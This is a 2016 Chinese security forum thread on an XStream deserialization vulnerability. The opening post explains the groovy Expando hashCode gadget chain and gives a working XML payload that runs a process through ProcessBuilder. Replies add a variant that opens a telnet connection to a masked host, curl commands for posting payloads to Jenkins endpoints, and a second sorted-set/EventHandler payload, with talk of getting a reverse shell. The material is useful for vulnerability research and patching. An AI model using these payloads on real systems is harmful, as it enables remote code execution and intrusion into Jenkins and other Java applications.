Java又一个反序列化漏洞——XStream漏洞

XStream是一个著名的反序列化的库，用途广泛，原文中作者以Jenkins为例。实际上XStream可以用在JIRA, Confluence, Bamboo，甚至是Spring和Struts中。
作者发现，在groovy.util.Expando重载hashCode方法的时候出了问题：
public int hashCode() {
  Object method = getProperties().get("hashCode");
  if (method != null && method instanceof Closure) {
    // invoke overridden hashCode closure method
    Closure closure = (Closure) method;
    closure.setDelegate(this);
    Integer ret = (Integer) closure.call();
    return ret.intValue();
  } else {
    return super.hashCode();
  }
}
当Expando中存在闭包对象时，Expando会使用该方法计算并返回hashCode，然而这个闭包对象是可控的，从而可以执行我们的代码。
于是作者给出了EXP，使用XStream解析下面的片段时，会弹出计算器：
<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <!--这里是告诉Expando计算hashCode的时候使用我们的闭包方法--!>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando" reference="../../../.."/>
            <!--执行打开计算器的操作（当然也可以是别的！）--!>
            <owner class="java.lang.ProcessBuilder">
              <command>
                <string>open</string>
                <string>/Applications/Calculator.app</string>
              </command>
              <redirectErrorStream>false</redirectErrorStream>
            </owner>
            <resolveStrategy>0</resolveStrategy>
            <directive>0</directive>
            <parameterTypes/>
            <maximumNumberOfParameters>0</maximumNumberOfParameters>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>1</int>
  </entry>
</map>
给出的执行链：
MapConverter#populateMap() 调用了 HashMap#put()
HashMap#put() 调用了 Expando#hashCode()
Expando#hashCode() 调用了 MethodClosure#call()
MethodClosure#call() 调用了 MethodClosure#doCall()
MethodClosure#doCall() 调用了 InvokerHelper#invokeMethod()
InvokerHelper#invokeMethod() 调用了 ProcessBuilder#start()
EXP的意义是我们在MethodClosure#call()中执行动作，传递进去污染数据，执行任意代码。
详细见：
https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream?platform=hootsuite

收藏 感谢(0)

分享到： 0

22 个回复

1. 
   1# hkAssassin | 2016-02-26 11:28

   66666

2. 
   2# _Thorns (创业公司招聘系统运维、软件逆向、数据可视化攻城狮。) | 2016-02-26 11:29

   先mark。

3. 
   3# 坏男孩-A_A | 2016-02-26 11:35

   mark

4. 
   4# 坏男孩-A_A | 2016-02-26 11:37

   代码审计起来就得爽了

5. 
   5# 我是壮丁 (专业打酱油) | 2016-02-26 11:42

   周末有事干了。。。

6. 
   6# Grani | 2016-02-26 11:47

   mark

7. 
   7# 爱上平顶山 (IT民工 职业搬砖 挖坑 丝一枚 神马都不会~) | 2016-02-26 11:48

   ...........

8. 
   8# Kuuki | 2016-02-26 12:20

   <map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando" reference="../../../.."/>
            <owner class="java.lang.ProcessBuilder">
              <command>
                <string>telnet</string>
                <string>***IP***</string>
       <string>***PORT***</string>
              </command>
              <redirectErrorStream>false</redirectErrorStream>
            </owner>
            <resolveStrategy>0</resolveStrategy>
            <directive>0</directive>
            <parameterTypes/>
            <maximumNumberOfParameters>0</maximumNumberOfParameters>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>1</int>
  </entry>
</map>

9. 
   9# 隐形人真忙 (关注安全研发与漏洞) | 2016-02-26 12:50

   @我是壮丁 你周末不是一直挺忙吗：D

10. 
    10# Bhunter | 2016-02-26 12:53

    看不懂的忧伤

11. 
    11# LoveSnow (我要努力，争取开发自己的神器) | 2016-02-26 13:00

    先mark

12. 
    12# ghy459 (深挖洞，广积shell。) | 2016-02-26 13:27

    @Kuuki 你为何这么屌

13. 
    13# tig3r | 2016-02-26 14:22

    1. curl -X POST "http://jenkins/job/test/config.xml" --data-binary xml文件 -H "Content-Type: text/xml"
    2. curl -X POST "http://jenkins/createItem?name=test" --data-binary xml文件 -H "Content-Type: text/xml"
    3. ...一堆接口

14. 
    14# PiaCa (ﻬ10wb 求把 PiaCa 改成 piaca) | 2016-02-26 14:32

    @tig3r 有不需要权限的接口吗？

15. 
    15# tig3r | 2016-02-26 14:41

    @PiaCa 没找到 如果有谁找到了这里分享下哈

16. 
    16# 隐形人真忙 (关注安全研发与漏洞) | 2016-02-26 15:29

    @PiaCa @tig3r  那篇博客给出的只是运用在jenkins的一个例子 理论上如果app同时使用XStream和Groovy都会有影响
    研究java web的大神都在闷声发大财吗

17. 
    17# Mayter | 2016-02-26 16:21

    mark

18. 
    18# ’‘Nome (<>?:"{}!%^#&*看出啥来了?) | 2016-02-26 16:23

    谢谢

19. 
    19# f4ckbaidu (wtf) | 2016-02-26 16:57

    13年就有了的= =
    http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/

20. 
    20# 打电话叫人 (没事，打电话叫人) | 2016-02-27 07:45

    m

21. 
    21# Fire ant | 2016-02-27 09:38

    其实我一直想问遇到windows怎么反弹shell。。。。。

22. 
    22# 七叶 | 2016-02-27 13:29

    xstream底层锅，上层触发方式有两种
    1. sort-map: proxy代理拦截执行
    String payload =
    "<sorted-set>" +
        "<string>littlehann</string>" +
        "<dynamic-proxy>" +
        "<interface>java.lang.Comparable</interface>" +
        "<handler class=\"java.beans.EventHandler\">" +
            " <target class=\"java.lang.ProcessBuilder\">" +
            " <command>" +
                " <string>notepad.exe</string>" +
            " </command>" +
            " </target>" +
            " <action>start</action>" +
        "</handler>" +
        "</dynamic-proxy>" +
    "</sorted-set>"
    
    2. grovy闭包执行重载hashCode
    String payload =
    "<map>" +
    "  <entry>" +
    "    <groovy.util.Expando>" +
    "      <expandoProperties>" +
    "        <entry>" +
    "          <string>hashCode</string>" +
    "          <org.codehaus.groovy.runtime.MethodClosure>" +
    "            <delegate class=\"groovy.util.Expando\" reference=\"../../../..\"/>" +
    "            <owner class=\"java.lang.ProcessBuilder\">" +
    "              <command>" +
    "                <string>notepad.exe</string>" +
    "              </command>" +
    "              <redirectErrorStream>false</redirectErrorStream>" +
    "            </owner>" +
    "            <resolveStrategy>0</resolveStrategy>" +
    "            <directive>0</directive>" +
    "            <parameterTypes/>" +
    "            <maximumNumberOfParameters>0</maximumNumberOfParameters>" +
    "            <method>start</method>" +
    "          </org.codehaus.groovy.runtime.MethodClosure>" +
    "        </entry>" +
    "      </expandoProperties>" +
    "    </groovy.util.Expando>" +
    "    <int>1</int>" +
    "  </entry>" +
    "</map>"